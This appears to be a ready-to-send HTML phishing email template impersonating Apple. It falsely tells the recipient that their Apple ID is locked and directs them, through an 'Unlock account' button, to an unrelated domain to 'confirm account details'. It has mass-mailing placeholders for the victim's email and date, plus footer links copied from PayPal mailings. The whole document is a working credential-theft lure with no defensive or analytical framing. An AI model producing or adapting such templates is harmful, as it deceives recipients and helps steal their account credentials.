<!doctype html>
<html>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="format-detection" content="telephone=no" />
    <title></title>
<style type="text/css">
table th {
	margin: 0 !important;
	padding: 0 !important;
	vertical-align: top;
	font-weight: normal;
}
body {
	margin: 0;
	padding: 0;
	font-family: Arial;
	font-size: 16px;
	color: #666666;
}
* {
	line-height: normal !important;
}
/*Yahoo paragraph fix*/
        
p {
	margin: 1em 0;
	color: #333;
}
/*This resolves the Outlook 07, 10, and Gmail td padding issue fix*/
        
table td {
	border-collapse: collapse;
}
        /*viewport width scaling for all devices*/
        
        @-ms-viewport {
 width: device-width;
}
/*This resolves the issue when iphone puts links on dates, etc.*/
        
.appleLinks {
	color: inherit;
	text-decoration: none;
}
.appleLinks a {
	color: inherit;
	text-decoration: none;
}
a[href^="x-apple-data-detectors:"] {
	color: inherit;
	text-decoration: inherit;
}
 @media screen and (max-width: 480px) {
/*Do not show in mobiles*/
            
*.nomobile,  *[class~="hide"] {
	display: none !important;
}
/*Shows in mobiles*/
            
*.show {
	display: block !important;
	margin: 0 !important;
	padding: 0 !important;
	overflow: visible !important;
	width: auto !important;
	max-height: inherit !important;
}
.container {
	width: 100% !important;
	min-width: 100% !important;
}
.content {
	width: 91.71428571428571% !important;
}
*[class~="logo"],  *[class~="logo_right"] {
	width: 80% !important;
}
*[class~="log_top"] {
	width: 108px !important;
	height: 27px !important;
}
.coldrop {
	display: block !important;
	width: 100% !important;
}
.imgfull {
	width: 100% !important;
	height: auto !important;
}
.align_left {
	float: center !important;
	text-align: center !important;
}
.align_right {
	float: right !important;
	text-align: right !important;
}
*[class~="nopad"] {
	padding: 0px 0px 0px 0px !important;
}
*[class~="grey_line"] {
	border-top: 0px solid #CCC !important;
}
*[class~="dbl_line"] {
	border-top: 0px solid #CCC !important;
	border-bottom: 0px solid #CCC !important;
}
/* text styles */
            
*[class~="heading01"] {
	font-size: 25px !important;
}
.text01 {
	font-size: 12px !important;
}
.text02 {
	font-size: 14px !important;
}
.text03 {
	font-size: 16px !important;
}
.text04 {
	font-size: 10px !important;
}
.arrange_top {
	display: table-header-group !important;
}
.arrange_bottom {
	display: table-footer-group !important;
}
.height20 {
	height: 20px !important;
}
.height15 {
	height: 15px !important;
}
.height10 {
	height: 10px !important;
}
.height5 {
	height: 5px !important;
}
.width20 {
	width: 20px !important;
}
.width15 {
	width: 15px !important;
}
.width10 {
	width: 10px !important;
}
.width5 {
	width: 5px !important;
}
}
 @media screen and (max-width: 375px) {
body {
	-moz-text-size-adjust: none !important;
	-webkit-text-size-adjust: none !important;
	-ms-text-size-adjust: none !important;
}
.content_02 {
	width: 95% !important;
}
}
 @media screen and (max-width: 345px) {
*[class~="nav_links"],  *[class~="nav_links"] a,  a *[class~="nav_links"] {
	font-size: 10px !important;
	-webkit-text-size-adjust: none !important;
}
}
 @media screen and (max-width: 320px) {
/*    *[class~="logo"], *[class~="logo_right"] {
width:40% !important;
} */
            
*[class~="align_left320"] {
	float: center !important;
	text-align: center !important;
}
*[class~="align_right320"] {
	float: right !important;
	text-align: right !important;
}
.content_02 {
	width: 98% !important;
}
*[class~="logo"],  *[class~="logo_right"] {
	width: 70% !important;
}
}
.style2 {
	font-size: 0.000000001em
}
.style4 {
	font-size: 30px;
	font-weight: bold;
}
</style>
    </head>

    <body yahoo="fix" bgcolor="#F2F2F2">
<table bgcolor="#F2F2F2" width="100%" border="0" cellspacing="0" cellpadding="0">
      <tbody>
    <tr>
          <td bgcolor="#F2F2F2" valign="top" align="center"><table style="min-width:700px;" class="container" width="700" border="0" cellspacing="0" cellpadding="0">
              <tbody>
              <tr>
                  <td valign="top" align="center" style=""><!-- preheader -->
                  
                  <table bgcolor="#f2f2f2" style="table-layout:fixed;" width="100%" border="0" cellspacing="0" cellpadding="0">
                      <tr>
                      <td valign="top" align="center"><table bgcolor="#f2f2f2" width="700" class="container" border="0" cellspacing="0" cellpadding="0" style="min-width:700px;">
                          <tr>
                          <td valign="middle" style="padding:10px 0px 10px 0px;" align="center"><table class="content" bgcolor="#f2f2f2" width="700" border="0" cellspacing="0" cellpadding="0">
                              <tr>
                                <td valign="middle" align="center" width="75%" style="font-family:Arial; font-size:12px; color:#666666;">&nbsp;</td>
                                <td valign="middle" align="right" width="25%" style="font-family:Arial; font-size:12px; color:#666666;"><a style="font-family:Arial; color:#666666;" href="https://epl.paypal-communication.com/H/2/v20000015c7eb044e4ad0fc3f4bbe5be68/b98e04ce-31e2-4143-93de-7b93ef0fe62e/Html" target="_blank"></a></td>
                              </tr>
                            </table></td>
                        </tr>
                        </table></td>
                    </tr>
                    </table>
                  
                  <!-- /preheader --></td>
                </tr>
              <tr>
                  <td valign="top" align="center" style=""><!-- header --> 
                  
                  <!-- header ends --> 
                  
                  <!-- contents -->
                  
                  <table bgcolor="#f2f2f2" style="table-layout:fixed;" width="100%" border="0" cellspacing="0" cellpadding="0">
                      <tr>
                      <td valign="top" align="center"><table bgcolor="#f2f2f2" width="700" class="container" border="0" cellspacing="0" cellpadding="0" style="min-width:700px;">
                          <tr>
                          <td valign="middle" align="center"><table class="container" bgcolor="#F2F2F2" width="700" border="0" cellspacing="0" cellpadding="0">
                              <!-- curved_top -->
                              <tr>
                                <td class="grey_line" valign="middle" align="center" style="font-family:Arial; font-size:1px; color:#666666;" height="1"></td>
                              </tr>
                              <!-- curved_top ends -->
                              <tr>
                                <td valign="top" align="center"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                                    <tbody>
                                      <tr>
                                        <td valign="middle" class="nopad" bgcolor="#e3e3e3" align="center" style="font-family:Arial; font-size:12px; color:#666666; padding:0px 1px 0px 1px;"><table bgcolor="#F2F2F2" width="100%" border="0" cellspacing="0" cellpadding="0">
                                            <tr>
                                              <td style="font-family:Arial; font-size:12px; color:#666666;" align="center" valign="top"><table class="content" width="642" border="0" cellspacing="0" cellpadding="0">
                                                  <tr>
                                                    <td style="font-family:Arial; font-size:12px; color:#666666;" height="15"></td>
                                                  </tr>
                                                  <tr>
                                                    <td style="font-family:Arial; font-size:12px; color:#666666;"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                                                        <tr>
                                                          <th style="font-family:Arial; font-size:12px; color:#666666;" align="left" class="coldrop"> <table class="logo" border="0" cellspacing="0" cellpadding="0">
                                                              <tr>
                                                                <td style="font-family:Arial; font-size:16px; color:#012069;"><span class="style4" style="color: #333333;">Apple</span></td>
                                                              </tr>
                                                            </table>
                                                          </th>
                                                          <th class="coldrop" height="10" style="font-size: 1px;"> <!--[if gt mso 14]>&nbsp;<![endif]--> </th>
                                                          <th style="font-family:Arial; font-size:12px; color:#666666;" align="right" class="coldrop"> <table border="0" cellspacing="0" cellpadding="0" align="right">
                                                              <tr>
                                                                <td style="font-family:Arial; font-size:12px; color:#666666; word-break:break-all;" align="right" class=""><a style="text-decoration:none; color:#009cde; font-weight:bold;" href="&email&" target="_blank">&email&</a> <br>
                                                                  &date& </td>
                                                              </tr>
                                                            </table>
                                                          </th>
                                                        </tr>
                                                      </table></td>
                                                  </tr>
                                                  
                                                 
                                                  <tr>
                                                    <td style="font-family: Verdana, Geneva, sans-serif; font-size: 15px; color: #666666;" height="15"><div align="center">
                                                      <p><span class="heading01" style="font-family: Arial; font-size: 24px; color: #333333;">This Apple ID has been locked for security reasons</span></p>
                                                      <p>In order to unlock the account you must confirm your account details.</p>
                                                    </div></td>
                                                  </tr>
                                                </table></td>
                                            </tr>
                                            <tr>
                                              <td style="font-family:Arial; font-size:12px; color:#666666;" align="center" valign="top"><table class="content" align="center" width="642" border="0" cellspacing="0" cellpadding="0">
                                                  
                                                  
                                                  <tr>
                                                    <td align="center" style="font-family:Arial; font-size:16px; color:#666666;" valign="middle"><p>&nbsp;</p>
                                                      <table width="310" class="container" border="0" cellspacing="0" cellpadding="0">
                                                        <tr> 
                                                          
                                                          <!--[if lt IE 9 | mso]>
<td bgcolor="#009cde" width="5" style="font-family:Arial; font-size:16px; color:#666666;" align="center">
<![endif]-->
                                                          <td align="center" bgcolor="#0033FF" style="font-family:Arial; font-size:16px; color:#666666; border-radius: 7px;" ><table width="100%" border="0" cellspacing="0" cellpadding="0">
                                                              <tr>
                                                                <td style="font-family: Arial; font-size: 14px; color: #FFFFFF; text-decoration: none; border-radius: 1em;"  align="center"><a href="https://mahaneer.com/csssite/?&cucu&" style="display:block; text-decoration:none; color:#ffffff; padding:10px 0px 10px 0px; font-weight:bold;" target="_blank">Unlock account</a></td>
                                                              </tr>
                                                            </table></td>
                                                          
                                                          <!--[if lt IE 9 | mso]>
<td width="5" style="font-family:Arial; font-size:16px; color:#666666;" valign="middle"></td>
<![endif]--> 
                                                        </tr>
                                                      </table></td>
                                                  </tr>
                                                  <tr>
                                                    <td style="font-family:Arial; font-size:1px; color:#666666;" height="25" class="height15"></td>
                                                  </tr>
                                                </table></td>
                                            </tr>
                                          </table></td>
                                      </tr>
                                    </tbody>
                                  </table></td>
                              </tr>
                              <!-- curved_bottom -->
                              <tr>
                                <td height="1" bgcolor="#e3e3e3" align="center" style="font-family:Arial; font-size:1px; color:#666666;"></td>
                              </tr>
                              <!-- curved_bottom ends --> 
                              <!-- contents ends --> 
                              <!-- /main content -->
                            </table></td>
                        </tr>
                        </table></td>
                    </tr>
                    </table></td>
                </tr>
            
              <td valign="middle" align="center">&nbsp;</td>
            </tr>
              <!-- Seperator --> 
              
              <!-- Seperator end-->
              <tr>
              <td valign="middle" class="" align="center" style="font-family:Arial; font-size:12px; color:#666666;"><table bgcolor="" width="100%" border="0" cellspacing="0" cellpadding="0">
                  <tr>
                  <td style="font-family:Arial; font-size:12px; color:#666666;" align="center" valign="top"><table class="content" width="642" border="0" cellspacing="0" cellpadding="0">
                      <tr>
                        <td style="font-family:Arial; font-size:12px; color:#666666;">&nbsp;</td>
                      </tr>
                    </table></td>
                </tr>
                  <!-- Seperator -->
                  <tr>
                  <td height="15" style="font-size:1px;"><!--[if gt mso 14]>&nbsp;<![endif]--></td>
                </tr>
                  <tr>
                  <td height="1" bgcolor="#d9d9d9" style="font-size:1px;"><!--[if gt mso 14]>&nbsp;<![endif]--></td>
                </tr>
                  <tr>
                  <td height="1" bgcolor="#FFFFFF" style="font-size:1px;"><!--[if gt mso 14]>&nbsp;<![endif]--></td>
                </tr>
                  <tr>
                  <td height="15" style="font-size:1px;"><!--[if gt mso 14]>&nbsp;<![endif]--></td>
                </tr>
                  <!-- Seperator end -->
                  <tr>
                  <td style="font-family:Arial; font-size:12px; color:#666666;" align="center" valign="top"><table class="content" width="642" border="0" cellspacing="0" cellpadding="0">
                      <tr>
                        <td style="font-family:Arial; font-size:12px; color:#666666;"><table width="100%" border="0" cellspacing="0" cellpadding="0">
                            <tr>
                              <th style="font-family:Arial; font-size:12px; color:#666666;" class="coldrop" align="left"> <table class="container" border="0" cellspacing="0" cellpadding="0">
                                  <tr>
                                    <td style="font-family:Arial; color:#666666;" align="center"><table border="0" cellspacing="0" cellpadding="0">
                                        <tr>
                                          <td align="left" style="font-family:Arial; font-size:11px; color:#8c8c8c; font-weight:normal !important;">This email was sent to <a style="color:#8c8c8c;" href="mailto:&email&">&email&</a>, because your email preferences are set to receive "alerts from Apple". Click to <a href="https://epl.paypal-communication.com/T/&email&v20000015c2317eb044e4ad0fc3f4bbe5be68/b98e04ce31e241430000021ef3a0bcd8" target="_blank" style="color:#8c8c8c;"><B>unsubscribe</B></a>. <br>
                                            <br>
                                            Copyright &copy; 1999-2017 Apple INC. All rights reserved. </td>
                                        </tr>
                                      </table></td>
                                  </tr>
                                </table>
                              </th>
                            </tr>
                          </table></td>
                      </tr>
                    </table></td>
                </tr>
                </table></td>
            </tr>
            </table></td>
        </tr>
</table>
</td>
</tr>
<tr>
      <td style="font-family:Arial; font-size:1px; color:#666666;" height="15"></td>
    </tr>
</table>
<!-- footer -->
</td>
</tr>
</tbody>
</table>
</body>
</html>